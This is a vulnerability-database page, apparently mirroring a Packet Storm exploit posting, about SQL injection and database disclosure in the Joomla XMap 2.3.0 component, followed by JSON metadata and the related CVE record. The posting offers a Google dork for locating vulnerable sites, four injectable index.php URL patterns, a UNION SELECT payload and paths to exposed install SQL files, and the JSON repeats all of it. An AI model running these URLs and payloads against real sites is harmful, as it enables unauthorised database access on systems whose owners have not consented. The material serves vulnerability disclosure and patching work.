Search...

Joomla XMap 2.3.0 Database Disclosure / SQL Injection

2019-01-31T00:00:00

ID PACKETSTORM:151436
Type packetstorm
Reporter KingSkrupellos
Modified 2019-01-31T00:00:00

Description

                                        
                                            `####################################################################  
  
# Exploit Title : Joomla XMap Components 2.3.0 SQL Injection / Database Disclosure  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 30/01/2019  
# Vendor Homepage : joomla.org  
# Software Download Links : joomla4ever.org/archive/ext/com_xmap.zip  
joomlacode.org/gf/project/xmap/frs/?action=FrsReleaseBrowse&frs_package_id=3882  
rsjoomla.com/support/documentation/rsblog-/plugins-and-modules/xmap-plugin.html  
# Software Information Link : joomla4ever.org/extensions/ext-xmap  
# Software Versions : 1.2.7 / 2.3.0 and other versions  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/index.php?option=com_xmap''  
# Vulnerability Type : CWE-89 [ Improper Neutralization of   
Special Elements used in an SQL Command ('SQL Injection') ]  
CWE-200 [ Information Exposure ]  
# Similar but for old Version CVE : cvedetails.com/cve/CVE-2010-2678/ - CVE-2010-2678  
Note : Keep in mind. This Exploit/Vuln has been told in more details.  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
# Reference Link : cxsecurity.com/issue/WLB-2019010285  
  
####################################################################  
  
# Description about Software :  
***************************  
  
"XMAP" is open source software for Joomla.  
  
####################################################################  
  
# Impact :  
***********  
* SQL injection vulnerability in xmap (com_xmap) component for Joomla!   
  
allows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php.   
  
* Successful exploitation will let attackers to manipulate SQL queries by injecting arbitrary SQL code.  
  
* The flaw is due to input passed via 'view=' and 'Itemid=' parameter to 'index.php'   
  
is not properly sanitised before being used in a SQL query.  
  
####################################################################  
  
# SQL Injection Exploit :  
**********************  
  
/index.php?option=com_xmap&Itemid=[SQL Injection]  
  
/index.php?option=com_xmap&sitemap=[ID-NUMBER]&Itemid=[SQL Injection]  
  
/index.php?option=com_xmap&tmpl=component&Itemid=[ID-NUMBER]&view=[SQL Injection]  
  
/index.php?option=com_xmap&view=html&id=[ID-NUMBER]&Itemid=[SQL Injection]  
  
# Exploit Payload :  
*****************  
  
-1 UNION SELECT 1,2,3,version(),5,6,7,8--  
  
####################################################################  
  
# Database Disclosure Exploit :  
****************************  
  
/administrator/components/com_xmap/install/install.postgresql.sql  
  
/administrator/components/com_xmap/install/install.utf8.sql  
  
/administrator/components/com_xmap/install/uninstall.postgresql.sql  
  
/administrator/components/com_xmap/install/uninstall.utf8.sql  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:151436", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla XMap 2.3.0 Database Disclosure / SQL Injection", "description": "", "published": "2019-01-31T00:00:00", "modified": "2019-01-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/151436/Joomla-XMap-2.3.0-Database-Disclosure-SQL-Injection.html", "reporter": "KingSkrupellos", "references": [], "cvelist": ["CVE-2010-2678"], "lastseen": "2019-02-01T02:55:02", "viewCount": 6, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-02-01T02:55:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-2678"]}], "modified": "2019-02-01T02:55:02", "rev": 2}, "vulnersScore": 5.4}, "sourceHref": "https://packetstormsecurity.com/files/download/151436/joomlaxmap230-sqldisclose.txt", "sourceData": "`#################################################################### \n \n# Exploit Title : Joomla XMap Components 2.3.0 SQL Injection / Database Disclosure \n# Author [ Discovered By ] : KingSkrupellos \n# Team : Cyberizm Digital Security Army \n# Date : 30/01/2019 \n# Vendor Homepage : joomla.org \n# Software Download Links : joomla4ever.org/archive/ext/com_xmap.zip \njoomlacode.org/gf/project/xmap/frs/?action=FrsReleaseBrowse&frs_package_id=3882 \nrsjoomla.com/support/documentation/rsblog-/plugins-and-modules/xmap-plugin.html \n# Software Information Link : joomla4ever.org/extensions/ext-xmap \n# Software Versions : 1.2.7 / 2.3.0 and other versions \n# Tested On : Windows and Linux \n# Category : WebApps \n# Exploit Risk : Medium \n# Google Dorks : inurl:''/index.php?option=com_xmap'' \n# Vulnerability Type : CWE-89 [ Improper Neutralization of \nSpecial Elements used in an SQL Command ('SQL Injection') ] \nCWE-200 [ Information Exposure ] \n# Similar but for old Version CVE : cvedetails.com/cve/CVE-2010-2678/ - CVE-2010-2678 \nNote : Keep in mind. This Exploit/Vuln has been told in more details. \n# PacketStormSecurity : packetstormsecurity.com/files/authors/13968 \n# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ \n# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos \n# Reference Link : cxsecurity.com/issue/WLB-2019010285 \n \n#################################################################### \n \n# Description about Software : \n*************************** \n \n\"XMAP\" is open source software for Joomla. \n \n#################################################################### \n \n# Impact : \n*********** \n* SQL injection vulnerability in xmap (com_xmap) component for Joomla! \n \nallows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php. \n \n* Successful exploitation will let attackers to manipulate SQL queries by injecting arbitrary SQL code. \n \n* The flaw is due to input passed via 'view=' and 'Itemid=' parameter to 'index.php' \n \nis not properly sanitised before being used in a SQL query. \n \n#################################################################### \n \n# SQL Injection Exploit : \n********************** \n \n/index.php?option=com_xmap&Itemid=[SQL Injection] \n \n/index.php?option=com_xmap&sitemap=[ID-NUMBER]&Itemid=[SQL Injection] \n \n/index.php?option=com_xmap&tmpl=component&Itemid=[ID-NUMBER]&view=[SQL Injection] \n \n/index.php?option=com_xmap&view=html&id=[ID-NUMBER]&Itemid=[SQL Injection] \n \n# Exploit Payload : \n***************** \n \n-1 UNION SELECT 1,2,3,version(),5,6,7,8-- \n \n#################################################################### \n \n# Database Disclosure Exploit : \n**************************** \n \n/administrator/components/com_xmap/install/install.postgresql.sql \n \n/administrator/components/com_xmap/install/install.utf8.sql \n \n/administrator/components/com_xmap/install/uninstall.postgresql.sql \n \n/administrator/components/com_xmap/install/uninstall.utf8.sql \n \n#################################################################### \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n#################################################################### \n`\n"}

{"cve": [{"lastseen": "2020-10-03T11:57:27", "description": "SQL injection vulnerability in xmap (com_xmap) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php.", "edition": 3, "cvss3": {}, "published": "2010-07-08T22:30:00", "title": "CVE-2010-2678", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2678"], "modified": "2018-10-10T19:59:00", "cpe": ["cpe:/a:guillermo_vargas:com_xmap:*"], "id": "CVE-2010-2678", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2678", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:guillermo_vargas:com_xmap:*:*:*:*:*:*:*:*"]}]}